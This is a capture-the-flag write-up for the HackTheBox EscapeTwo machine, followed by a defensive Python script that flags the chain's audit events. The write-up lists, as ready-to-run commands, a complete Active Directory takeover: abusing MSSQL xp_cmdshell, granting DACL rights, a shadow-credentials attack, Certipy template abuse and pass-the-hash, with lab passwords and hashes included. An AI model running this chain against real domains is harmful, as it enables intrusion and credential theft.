Welcome to my HackTheBox EscapeTwo write-up! First we add the machine IP to our /etc/hosts file with this command:
echo "10.10.11.51 escapetwo.htb" >> /etc/hosts
Then we start enumeration with rustscan:
rustscan -a 10.10.11.51 -- -sC -sV
We see that many ports are open, but there is no useful exploit for these service versions, so we keep enumerating SMB with the rose credentials:
smbclient -U rose --password='KxEPkKe6R8su' -L 10.10.11.51
To connect to the SMB shares we can use Metasploit with these commands:
msfconsole -q
use auxiliary/scanner/smb/smb_login
set RHOSTS 10.10.11.51
set SMBUser rose
set SMBPass 'KxEPkKe6R8su'
set CreateSession true
run
sessions -i 1
We see some SMB shares. Inside the Accounting Department share we find two files, and in accounts.xlsx we find four users and their passwords.
From the rustscan output we see an MSSQL service on port 1433, and among these accounts the user sa looks like an MSSQL login. To connect to MSSQL we can use impacket-mssqlclient with this command:
python3 mssqlclient.py sequel.htb/sa:"MSSQLP@ssw0rd!"@10.10.11.51
We see that we can't run system commands with xp_cmdshell because it is disabled. We enable it with these commands (show advanced options has to be turned on first, otherwise sp_configure rejects the xp_cmdshell option):
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Now we can run system commands (after a few commands MSSQL resets xp_cmdshell; to run commands again just enable it again). After some enumeration we find the SQL Server 2019 setup configuration file.
We can read it with this command (single quotes, since T-SQL treats double-quoted text as an identifier by default):
EXEC xp_cmdshell 'type c:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI';
The output contains some passwords. We can't use evil-winrm with the sql_svc user, but after checking c:\Users we see there is another user named ryan, and the sql_svc password works for him, so we can get a shell:
evil-winrm -i 10.10.11.51 -u ryan -p 'WqSZAF6CysDQbGb3'
After that we can use bloodhound-python to enumerate AD:
bloodhound-python -u 'ryan' -p 'WqSZAF6CysDQbGb3' -d sequel.htb -ns 10.10.11.51 -c All --zip
After importing the zip file into BloodHound we see three Kerberoastable accounts.
We can try to make ryan the owner of ca_svc with this command:
bloodyAD --host 10.10.11.51 -d escapetwo.htb -u ryan -p WqSZAF6CysDQbGb3 set owner CA_SVC ryan
The command succeeds. To get full control over the user ca_svc we can use impacket-dacledit like this (adding sequel.htb to /etc/hosts first):
echo "10.10.11.51 sequel.htb" >> /etc/hosts
python3 dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"
With full control granted, to get the hash of ca_svc we perform a shadow credentials attack. This attack adds a key controlled by ryan to the msDS-KeyCredentialLink attribute of ca_svc; after that, ryan can authenticate as ca_svc with that key. We can do this with Certipy like this:
certipy shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.10.11.51'
Now we have the NTLM hash of ca_svc. This user can manage the certificate templates that determine what a certificate authorizes, so we can modify a template to escalate our privileges. First we need to learn the template name with this command:
certipy find -u 'ryan@sequel.htb' -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51
From this output we learn that the template name is DunderMifflinAuthentication. We can modify the template to escalate our privileges with this command:
KRB5CCNAME=$PWD/ca_svc.ccache certipy template -k -template DunderMifflinAuthentication -dc-ip 10.10.11.51 -target dc01.sequel.htb
After updating the template we can request a certificate for Administrator with these commands:
echo "10.10.11.51 dc01.sequel.htb" >> /etc/hosts
certipy req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51
Now we have Administrator's certificate. We can get Administrator's hash with this command:
certipy auth -pfx administrator_10.pfx -domain sequel.htb
Finally we can log in with evil-winrm with this command:
evil-winrm -i 10.10.11.51 -u Administrator -H '7a8d4e04986afa8ed4060f75e5a0b3ff'
And done, we are Administrator. Thanks for reading!
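From the defender's side, every step of this chain leaves an audit artefact: MSSQL message 15457 when sp_configure flips xp_cmdshell, Windows event 5136 when nTSecurityDescriptor (owner/DACL) or msDS-KeyCredentialLink is written on ca_svc, and event 4899 when the certificate template is updated. The triage script below is an added example, not part of the original write-up; the "source|event_id|k=v;k=v" line format, the sample events and the TRUSTED_WRITERS allow-list are constructed assumptions, while the event IDs are the real ones.

```python
import re

# Constructed sample events in a simplified "source|event_id|k=v;k=v" format
# (an assumption of this example, not any real SIEM export). The IDs are real:
# 5136 directory object modified, 4899 certificate template updated,
# MSSQL message 15457 for an sp_configure change.
SAMPLE_EVENTS = [
    "mssql|15457|msg=Configuration option 'xp_cmdshell' changed from 0 to 1",
    "dc01|5136|subject=SEQUEL\\ryan;object=CN=ca_svc,CN=Users,DC=sequel,DC=htb;"
    "attr=nTSecurityDescriptor",
    "dc01|5136|subject=SEQUEL\\ryan;object=CN=ca_svc,CN=Users,DC=sequel,DC=htb;"
    "attr=msDS-KeyCredentialLink",
    "dc01|4899|subject=SEQUEL\\ca_svc;template=DunderMifflinAuthentication",
    "dc01|5136|subject=SEQUEL\\helpdesk;object=CN=bob,CN=Users,DC=sequel,DC=htb;"
    "attr=description",
]

# Accounts expected to touch security descriptors, key credentials and
# templates (hypothetical allow-list; fill it from your own change process).
TRUSTED_WRITERS = {"SEQUEL\\Administrator", "SEQUEL\\DC01$"}

# Attributes whose modification by an untrusted principal maps to a step above.
WATCHED_ATTRS = {
    "nTSecurityDescriptor": "owner/DACL change",
    "msDS-KeyCredentialLink": "shadow credential (PKINIT key) added",
}

def parse_event(line):
    # Split "source|event_id|rest"; only the first '=' of each k=v pair is the
    # separator, so DN values such as "CN=ca_svc,DC=sequel" survive intact.
    source, event_id, rest = line.split("|", 2)
    fields = dict(kv.partition("=")[::2] for kv in rest.split(";"))
    return {"source": source, "event_id": int(event_id), **fields}

def detect(lines):
    alerts = []
    for ev in map(parse_event, lines):
        eid, who = ev["event_id"], ev.get("subject", "")
        if eid == 15457 and re.search(r"'xp_cmdshell' changed from 0 to 1", ev["msg"]):
            alerts.append("xp_cmdshell enabled on %s" % ev["source"])
        elif eid == 5136 and ev["attr"] in WATCHED_ATTRS and who not in TRUSTED_WRITERS:
            alerts.append("%s on %s by %s" % (WATCHED_ATTRS[ev["attr"]], ev["object"], who))
        elif eid == 4899 and who not in TRUSTED_WRITERS:
            alerts.append("certificate template %s modified by %s" % (ev["template"], who))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

The benign description change by the helpdesk account is not flagged, while the four steps of the escalation chain each produce one alert.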